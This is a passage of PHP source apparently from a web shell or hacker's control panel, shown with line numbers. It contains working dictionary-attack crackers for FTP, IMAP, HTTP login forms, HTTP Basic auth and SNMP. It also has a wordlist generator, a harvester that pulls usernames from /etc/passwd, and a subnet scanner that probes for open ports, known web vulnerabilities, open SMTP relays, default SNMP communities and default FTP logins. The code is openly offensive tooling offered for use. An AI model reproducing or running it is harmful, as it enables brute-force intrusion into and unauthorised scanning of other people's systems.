  6652. echo "<center><table border=\"0\" style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"40%\"><tbody><form method=\"POST\" name=\"form\" action=\"\"><tr><td width=\"40%\" bgcolor=\"#333333\">FTP cracker:</td><td bgcolor=\"#333333\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=\"text\" name=\"dictionary\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=\"radio\" name=\"combo\" checked=\"\" value=\"0\" onclick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=\"radio\" value=\"1\" name=\"combo\" onclick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=\"text\" size=\"35\" value=\"root\" name=\"user\"></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=\"text\" name=\"target\" value=\"localhost\" size=\"35\"></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input class=\"buttons\" type=\"submit\" value=\"Start\"></td></tr></form></tbody></table></center>";
  6653.  
  6654. }
  6655. }
  6656.  
  6657. if ($act == "imap")
  6658. {
  6659. global $t,$et,$errorbox,$crack;
  6660. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  6661. $target=$_REQUEST['target'];
  6662. $type=$_REQUEST['combo'];
  6663. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  6664. $dictionary=fopen($_REQUEST['dictionary'],'r');
  6665. if ($dictionary){
  6666. echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
  6667. while(!feof($dictionary)){
  6668. if($type){
  6669. $combo=trim(fgets($dictionary)," \n\r");
  6670. $user=substr($combo,0,strpos($combo,':'));
  6671. $pass=substr($combo,strpos($combo,':')+1);
  6672. }else{
  6673. $pass=trim(fgets($dictionary)," \n\r");
  6674. }
  6675. $imap=imaplogiN($target,$user,$pass);
  6676. if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{
  6677. if ($imap){echo "U: $user P: $pass<br>";if(!$type)break;}}
  6678. flusheR();
  6679. }
  6680. echo "<br/>Done</font>";
  6681. fclose($dictionary);
  6682. }
  6683. else{
  6684. echo "$errorbox Can not open dictionary.$et";
  6685. }
  6686. }else
  6687. {
  6688. echo "<center>IMAP cracker:$crack</center>";
  6689. }
  6690. print ('<center><table border="0" style="border-collapse: collapse" bordercolor= "#282828" width="40%"><tbody><form method="POST" name="form" action=""><tr><td width="40%" bgcolor="#333333">IMAP cracker:</td><td bgcolor="#333333"></td></tr><tr><td width="20%" bgcolor="#666666">Dictionary:</td><td bgcolor="#666666"><input type="text" name="dictionary" size="35" \></td></tr><tr><td width="20%" bgcolor="#808080" \>Dictionary type:</td><td bgcolor="#808080"><input type="radio" name="combo" checked="" value="0" onclick="document.form.user.disabled = false;" style="border-width:1px;background-color:#808080;" \>Simple (P)<input type="radio" value="1" name="combo" onclick="document.form.user.disabled = true;" style="border-width:1px;background-color:#808080;">Combo (U:P)</td></tr><tr><td width="20%" bgcolor="#666666" \>Username:</td><td bgcolor="#666666"><input type="text" size="35" value="root" name="use" \></td></tr><tr><td width="20%" bgcolor="#808080">Server:</td><td bgcolor="#808080"><input type="text" name="target" value="localhost" size="35" \></td></tr><tr><td width="20%" bgcolor="#666666"></td><td bgcolor="#666666" align="right"><input type="submit" value="Start" \></td></tr></form></tbody></table></center>');
  6691.  
  6692. }
  6693.  
  6694. if ($act == "dic")
  6695. {
  6696. global $errorbox,$windows,$footer,$t,$et,$hcwd;
  6697. if (!empty($_REQUEST['combo'])&&($_REQUEST['combo']==1)) $combo=1 ; else $combo=0;
  6698. if (!empty($_REQUEST['range']) && !empty($_REQUEST['output']) && !empty($_REQUEST['min']) && !empty($_REQUEST['max'])){
  6699. $min = $_REQUEST['min'];
  6700. $max = $_REQUEST['max'];
  6701. if($max<$min)die($errorbox ."Bad input!$et". $footer);
  6702. $s =$w="";
  6703. $out = $_REQUEST['output'];
  6704. $r = ($_REQUEST['range']=='a' )?'a':'A';
  6705. if ($_REQUEST['range']==0) $r=0;
  6706. for($i=0;$i<$min;$i++) $s.=$r;
  6707. $dic = fopen($out,'a');
  6708. if(is_nan($r)){
  6709. while(strlen($s)<=$max){
  6710. $w = $s;
  6711. if($combo)$w="$w:$w";
  6712. fwrite($dic,$w."\n");
  6713. $s++;}
  6714. }
  6715. else{
  6716. while(strlen($w)<=$max){
  6717. $w =(string)str_repeat("0",($min - strlen($s))).$s;
  6718. if($combo)$w="$w:$w";
  6719. fwrite($dic,$w."\n");
  6720. $s++;}
  6721. }
  6722. fclose($dic);
  6723. echo "<font color=yellow>Done</font>";
  6724. }
  6725. if (!empty($_REQUEST['input']) && !empty($_REQUEST['output'])){
  6726. $input=fopen($_REQUEST['input'],'r');
  6727. if (!$input){
  6728. if ($windows)echo $errorbox. "Unable to read from ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
  6729. else{
  6730. $input=explode("\n",shelL("cat $input"));
  6731. $output=fopen($_REQUEST['output'],'w');
  6732. if ($output){
  6733. foreach ($input as $in){
  6734. $user = $in;
  6735. $user = trim(fgets($in)," \n\r");
  6736. if (!strstr($user,":"))continue;
  6737. $user=substr($user,0,(strpos($user,':')));
  6738. if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
  6739. }
  6740. fclose($input);fclose($output);
  6741. echo "<font color=yellow>Done</font>";
  6742. }
  6743. }
  6744. }
  6745. else{
  6746. $output=fopen($_REQUEST['output'],'w');
  6747. if ($output){
  6748. while (!feof($input)){
  6749. $user = trim(fgets($input)," \n\r");
  6750. if (!strstr($user,":"))continue;
  6751. $user=substr($user,0,(strpos($user,':')));
  6752. if($combo) fwrite($output,$user.":".$user."\n"); else fwrite($output,$user."\n");
  6753. }
  6754. fclose($input);fclose($output);
  6755. echo "<font color=yellow>Done</font>";
  6756. }
  6757. else echo $errorbox." Unable to write data to ".htmlspecialchars($_REQUEST['input']) ."$et<br>";
  6758. }
  6759. }elseif (!empty($_REQUEST['url']) && !empty($_REQUEST['output'])){
  6760. $res=downloadiT($_REQUEST['url'],$_REQUEST['output']);
  6761. if($combo && $res){
  6762. $file=file($_REQUEST['output']);
  6763. $output=fopen($_REQUEST['output'],'w');
  6764. foreach ($file as $v)fwrite($output,"$v:$v\n");
  6765. fclose($output);
  6766. }
  6767. echo "<font color=yellow>Done</font>";
  6768. }else{
  6769. $temp=whereistmP();
  6770. echo "<center>
  6771. <table>
  6772. <tr valign=top><td>
  6773. <table>Wordlist generator:<form method=\"POST\">
  6774. <tr>
  6775. <td width=\"20%\" bgcolor=\"#666666\">Range:</td>
  6776. <td bgcolor=\"#666666\">
  6777. <select name=range>
  6778. <option value=a>a-z</option>
  6779. <option value=Z>A-Z</option>
  6780. <option value=0>0-9</option></select>
  6781. </td></tr>
  6782. <tr>
  6783. <td width=\"20%\" bgcolor=\"#808080\">Min lenght:</td>
  6784. <td bgcolor=\"#808080\">
  6785. <select name=min>
  6786. <option value=1>1</option>
  6787. <option value=2>2</option>
  6788. <option value=3>3</option>
  6789. <option value=4>4</option>
  6790. <option value=5>5</option>
  6791. <option value=6>6</option>
  6792. <option value=7>7</option>
  6793. <option value=8>8</option>
  6794. <option value=9>9</option>
  6795. <option value=10>10</option>
  6796. </select>
  6797. </td></tr>
  6798. <tr><td width=\"20%\" bgcolor=\"#666666\">Max lenght:</td>
  6799. <td bgcolor=\"#666666\">
  6800. <select name=max><option value=2>2</option><option value=3>3</option><option value=4>4</option><option value=5>5</option><option value=6>6</option><option value=7>7</option><option value=8 selected>8</option><option value=9>9</option><option value=10>10</option><option value=11>11</option><option value=12>12</option><option value=13>13</option><option value=14>14</option><option value=15>15</option></select>
  6801. </td></tr>
  6802. <tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
  6803. <tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox name=combo style=\"border-width:1px;background-color:#666666;\" value=1 checked>Combo style output</td></tr>
  6804. <tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Make></td></tr></form></table>
  6805. </td><td>
  6806. <table>Grab dictionary:
  6807. <form method=\"POST\">
  6808. <tr><td width=\"20%\" bgcolor=\"#666666\">Grab from:</td>
  6809. <td bgcolor=\"#666666\"><input type=text value=\"/etc/passwd\" name=input size=35></td></tr>
  6810. <tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td>
  6811. <td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
  6812. <tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
  6813. <tr>
  6814. <td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Grab></td></tr></form>
  6815. </table>
  6816. </td><td>
  6817. <table>Download dictionary:<form method=\"POST\">
  6818. <tr><td width=\"20%\" bgcolor=\"#666666\">URL:</td><td bgcolor=\"#666666\"><input type=text value=\"http://vburton.ncsa.uiuc.edu/wordlist.txt\" name=url size=35></td></tr>
  6819. <tr><td width=\"20%\" bgcolor=\"#808080\">Output:</td><td bgcolor=\"#808080\"><input type=text value=\"$temp/.dic\" name=output size=35></td></tr>
  6820. <tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\"><input type=checkbox style=\"border-width:1px;background-color:#666666;\" name=combo value=1 checked>Combo style output</td></tr>
  6821. <tr><td bgcolor=\"#808080\"></td><td bgcolor=\"#808080\" align=right>$hcwd<input class=buttons type=submit value=Get></td></tr></form></table>
  6822. </td>
  6823. </tr></table>
  6824. </center>             ";}
  6825. }
  6826.  
  6827. if ($act == "htmlform")
  6828. {
  6829. global $errorbox,$footer,$et,$hcwd;
  6830. if(!empty($_REQUEST['start'])){
  6831. $url=$_REQUEST['target'];
  6832. $uf=$_REQUEST['userf'];
  6833. $pf=$_REQUEST['passf'];
  6834. $sf=$_REQUEST['submitf'];
  6835. $sv=$_REQUEST['submitv'];
  6836. $method=$_REQUEST['method'];
  6837. $fail=$_REQUEST['fail'];
  6838. $dic=$_REQUEST['dictionary'];
  6839. $type=$_REQUEST['combo'];
  6840. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  6841. if(!file_exists($dic)) die("$errorbox Can not open dictionary.$et$footer");
  6842. $dictionary=fopen($dic,'r');
  6843. echo "<font color=blue>Cracking started...<br>";
  6844. while(!feof($dictionary)){
  6845. if($type){
  6846. $combo=trim(fgets($dictionary)," \n\r");
  6847. $user=substr($combo,0,strpos($combo,':'));
  6848. $pass=substr($combo,strpos($combo,':')+1);
  6849. }else{
  6850. $pass=trim(fgets($dictionary)," \n\r");
  6851. }
  6852. $url.="?$uf=$user&$pf=$pass&$sf=$sv";
  6853. $res=check_urL($url,$method,$fail,12);
  6854. if (!$res){echo "<font color=blue>U: $user P: $pass</font><br>";flusheR();if(!$type)break;}
  6855. flusheR();
  6856. }
  6857. fclose($dictionary);
  6858. echo "Done!</font><br>";
  6859. }
  6860. else echo "<center><table border=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" width=\"434\"><tr><td width=\"174\" bgcolor=\"#333333\">HTTP Form cracker:</td><td bgcolor=\"#333333\" width=\"253\"></td></tr><form method=\"POST\" name=form><tr><td width=\"174\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user>$hcwd</td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Action Page:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=target value=\"http://".getenv('HTTP_HOST')."/login.php\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Method:</td><td bgcolor=\"#666666\" width=\"253\"><select size=\"1\" name=\"method\"><option selected value=\"POST\">POST</option><option value=\"GET\">GET</option></select></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Username field name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=userf value=user size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Password field name:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text name=passf value=passwd size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Submit name:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text value=login name=submitf size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\">Submit value:</td><td bgcolor=\"#666666\" width=\"253\"><input type=text value=\"Login\" name=submitv size=35></td></tr><tr><td width=\"174\" bgcolor=\"#808080\">Fail string:</td><td bgcolor=\"#808080\" width=\"253\"><input type=text name=fail value=\"Try again\" size=35></td></tr><tr><td width=\"174\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right width=\"253\"><input class=buttons type=submit name=start value=Start></td></tr></form></table></center>";
  6861. }
  6862.  
  6863. if ($act == "basicauth")
  6864. {
  6865. global $errorbox,$et,$t,$crack,$hcwd;
  6866. if(!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  6867. $data='';
  6868. $method=($_REQUEST['method'])?'POST':'GET';
  6869. if(strstr($_REQUEST['target'],'?')){$data=substr($_REQUEST['target'],strpos($_REQUEST['target'],'?')+1);$_REQUEST['target']=substr($_REQUEST['target'],0,strpos($_REQUEST['target'],'?'));}
  6870. spliturL($_REQUEST['target'],$host,$page);
  6871. $type=$_REQUEST['combo'];
  6872. $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:"";
  6873. if($method='GET')$page.=$data;
  6874. $dictionary=fopen($_REQUEST['dictionary'],'r');
  6875. echo "<font color=blue>";
  6876. while(!feof($dictionary)){
  6877. if($type){
  6878. $combo=trim(fgets($dictionary)," \n\r");
  6879. $user=substr($combo,0,strpos($combo,':'));
  6880. $pass=substr($combo,strpos($combo,':')+1);
  6881. }else{
  6882. $pass=trim(fgets($dictionary)," \n\r");
  6883. }
  6884. $so=fsockopen($host,80,$en,$es,5);
  6885. if(!$so){echo "$errorbox Can not connect to host$et";break;}
  6886. else{
  6887. $packet="$method /$page HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nConnection: Close\r\nAuthorization: Basic ".base64_encode("$user:$pass");
  6888. if($method=='POST')$packet.="Content-Type: application/x-www-form-urlencoded\r\nContent-Length: ".strlen($data);
  6889. $packet.="\r\n\r\n";
  6890. $packet.=$data;
  6891. fputs($so,$packet);
  6892. $res=substr(fgets($so),9,2);
  6893. fclose($so);
  6894. if($res=='20')echo "U: $user P: $pass</br>";
  6895. flusheR();
  6896. }
  6897. }
  6898. echo "Done!</font>";
  6899. }else echo "<center><form method=\"POST\" name=form><table><tr><td bgcolor=\"#333333\"><font color=silver>
  6900. HTTP Auth cracker:</font></td><td bgcolor=\"#333333\"><select name=method><option value=1>POST</option><option value=0>GET</option></select></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Dictionary type:</td><td bgcolor=\"#808080\"><input type=radio name=combo checked value=0 onClick=\"document.form.user.disabled = false;\" style=\"border-width:1px;background-color:#808080;\">Simple (P)<input type=radio value=1 name=combo onClick=\"document.form.user.disabled = true;\" style=\"border-width:1px;background-color:#808080;\">Combo (U:P)</td></tr><tr><td width=\"20%\" bgcolor=\"#666666\">Username:</td><td bgcolor=\"#666666\"><input type=text size=35 value=root name=user></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target value=localhost size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right>$hcwd<input class=buttons type=submit value=Start></td></tr></form></table></center>";
  6901. }
  6902.  
  6903. if ($act == "snmp")
  6904. {
  6905. global $t,$et,$errorbox,$crack,$hcwd;
  6906. if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){
  6907. $target=$_REQUEST['target'];
  6908. $dictionary=fopen($_REQUEST['dictionary'],'r');
  6909. if ($dictionary){
  6910. echo "<font color=yellow>Cracking ".htmlspecialchars($target)."...<br>";flusheR();
  6911. while(!feof($dictionary)){
  6912. $com=trim(fgets($dictionary)," \n\r");
  6913. $res=snmpchecK($target,$com,2);
  6914. if($res)echo "$com<br>";
  6915. flusheR();
  6916. }
  6917. echo "<br>Done</font>";
  6918. fclose($dictionary);
  6919. }
  6920. else{
  6921. echo "$errorbox Can not open dictionary.$et";
  6922. }
  6923. }
  6924.  echo "<center><table width=\"50%\">SNMP cracker:<form method=\"POST\">$hcwd<tr><td width=\"20%\" bgcolor=\"#666666\">Dictionary:</td><td bgcolor=\"#666666\"><input type=text name=dictionary size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#808080\">Server:</td><td bgcolor=\"#808080\"><input type=text name=target size=35></td></tr><tr><td width=\"20%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=right><input class=buttons type=submit value=Start></td></tr></form></table></center>";
  6925. }
  6926.  
  6927.  
  6928.  
  6929. if ($act == "scanner")
  6930. {
  6931. global $hcwd;
  6932. if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1";
  6933. $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1;
  6934. if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){
  6935. $target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0;
  6936. echo "<font color=yellow>Port scanning started against ".htmlspecialchars($target).":<br>";
  6937. $start=time();
  6938. for($i=$from;$i<=$to;$i++){
  6939. if($tcp){
  6940. if (checkthisporT($target,$i,$timeout)){
  6941. $nu++;
  6942. $ser="";
  6943. if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")";
  6944. echo "$nu) $i $ser (<a href=\"telnet://$target:$i\">Connect</a>) [TCP]<br>";
  6945. }
  6946. }
  6947. if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP]<br>";}
  6948. flusheR();
  6949. }
  6950. $time=time()-$start;
  6951. echo "Done! ($time seconds)</font>";
  6952. }
  6953. elseif (!empty($_REQUEST['securityscanner'])){
  6954. echo "<font color=yellow>";
  6955. $start=time();
  6956. $from=$_REQUEST['from'];
  6957. $to=(int)$_REQUEST['to'];
  6958. $timeout=(int)$_REQUEST['timeout'];
  6959. $f = substr($from,strrpos($from,".")+1);
  6960. $from = substr($from,0,strrpos($from,"."));
  6961. if(!empty($_REQUEST['httpscanner'])){
  6962. echo "Loading webserver bug list...";
  6963. flusheR();
  6964. $buglist=whereistmP().DIRECTORY_SEPARATOR.namE();
  6965. $dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);
  6966. if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";
  6967. flusheR();
  6968. }else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}
  6969. for($i=$f;$i<=$to;$i++){
  6970. $output=0;
  6971. $ip="$from.$i";
  6972. if(!empty($_REQUEST['nslookup'])){
  6973. $hn=gethostbyaddr($ip);
  6974. if($hn!=$ip)echo "$ip [$hn]<br>";}
  6975. flusheR();
  6976. if(!empty($_REQUEST['ipscanner'])){
  6977. $port=$_REQUEST['port'];
  6978. if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;
  6979. $open=$ser="";
  6980. foreach($p as $po){
  6981. $scan=checkthisporT($ip,$po,$timeout);
  6982. if ($scan){
  6983. $ser="";
  6984. if($ser=getservbyport($po,"tcp"))$ser="($ser)";
  6985. $open.=" $po$ser ";
  6986. }
  6987. }
  6988. if($open){echo "$ip) Open ports:$open<br>";$output=1;}
  6989. flusheR();
  6990. }
  6991. if(!empty($_REQUEST['httpbanner'])){
  6992. $res=get_sw_namE($ip,$timeout);
  6993. if($res){
  6994. echo "$ip) Webserver software: ";
  6995. if($res==-1)echo "Unknow";
  6996. else echo $res;
  6997. echo "<br>";
  6998. $output=1;
  6999. }
  7000. flusheR();
  7001. }
  7002. if(!empty($_REQUEST['httpscanner'])){
  7003. if(checkthisporT($ip,80,$timeout) && !empty($file)){
  7004. $admin=array('/admin/','/adm/');
  7005. $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');
  7006. $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');
  7007. $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');
  7008. foreach ($file as $v){
  7009. $vuln=array();
  7010. $v=trim($v);
  7011. if(!$v || $v{0}=='#')continue;
  7012. $v=str_replace('","','^',$v);
  7013. $v=str_replace('"','',$v);
  7014. $vuln=explode('^',$v);
  7015. $page=$cqich=$nukech=$adminch=$userch=$vuln[1];
  7016. if(strstr($page,'@CGIDIRS'))
  7017. foreach($cgi as $cg){
  7018. $cqich=str_replace('@CGIDIRS',$cg,$page);
  7019. $url="http://$ip$cqich";
  7020. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  7021. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  7022. flusheR();
  7023. }
  7024. elseif(strstr($page,'@ADMINDIRS'))
  7025. foreach ($admin as $cg){
  7026. $adminch=str_replace('@ADMINDIRS',$cg,$page);
  7027. $url="http://$ip$adminch";
  7028. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  7029. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  7030. flusheR();
  7031. }
  7032. elseif(strstr($page,'@USERS'))
  7033. foreach ($users as $cg){
  7034. $userch=str_replace('@USERS',$cg,$page);
  7035. $url="http://$ip$userch";
  7036. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  7037. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  7038. flusheR();
  7039. }
  7040. elseif(strstr($page,'@NUKE'))
  7041. foreach ($nuke as $cg){
  7042. $nukech=str_replace('@NUKE',$cg,$page);
  7043. $url="http://$ip$nukech";
  7044. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  7045. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  7046. flusheR();
  7047. }
  7048. else{
  7049. $url="http://$ip$page";
  7050. $res=check_urL($url,$vuln[3],$vuln[2],$timeout);
  7051. if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}
  7052. flusheR();
  7053. }
  7054. }
  7055. }
  7056. }
  7057. if(!empty($_REQUEST['smtprelay'])){
  7058. if(checkthisporT($ip,25,$timeout)){
  7059. $res='';
  7060. $res=checksmtP($ip,$timeout);
  7061. if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();
  7062. }
  7063. }
  7064. if(!empty($_REQUEST['snmpscanner'])){
  7065. if(checkthisporT($ip,161,$timeout,1)){
  7066. $com=$_REQUEST['com'];
  7067. $coms=$res="";
  7068. if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
  7069. foreach ($c as $v){
  7070. $ret=snmpchecK($ip,$v,$timeout);
  7071. if($ret)$coms .=" $v ";
  7072. }
  7073. if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}
  7074. flusheR();
  7075. }
  7076. }
  7077. if(!empty($_REQUEST['ftpscanner'])){
  7078. if(checkthisporT($ip,21,$timeout)){
  7079. $usps=explode(',',$_REQUEST['userpass']);
  7080. foreach ($usps as $v){
  7081. $user=substr($v,0,strpos($v,':'));
  7082. $pass=substr($v,strpos($v,':')+1);
  7083. if($pass=='[BLANK]')$pass='';
  7084. $ftp=@ftp_connect($ip,21,$timeout);
  7085. if ($ftp){
  7086. if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}
  7087. }
  7088. flusheR();
  7089. }
  7090. }
  7091. }
  7092. if($output)echo "<hr size=1 noshade>";
  7093. flusheR();
  7094. }
  7095. $time=time()-$start;
  7096. echo "Done! ($time seconds)</font>";
  7097. if(!empty($buglist))unlink($buglist);
  7098. }
  7099. else{
  7100. $chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";
  7101. echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";
  7102. $host = substr($host,0,strrpos($host,"."));
  7103. echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco 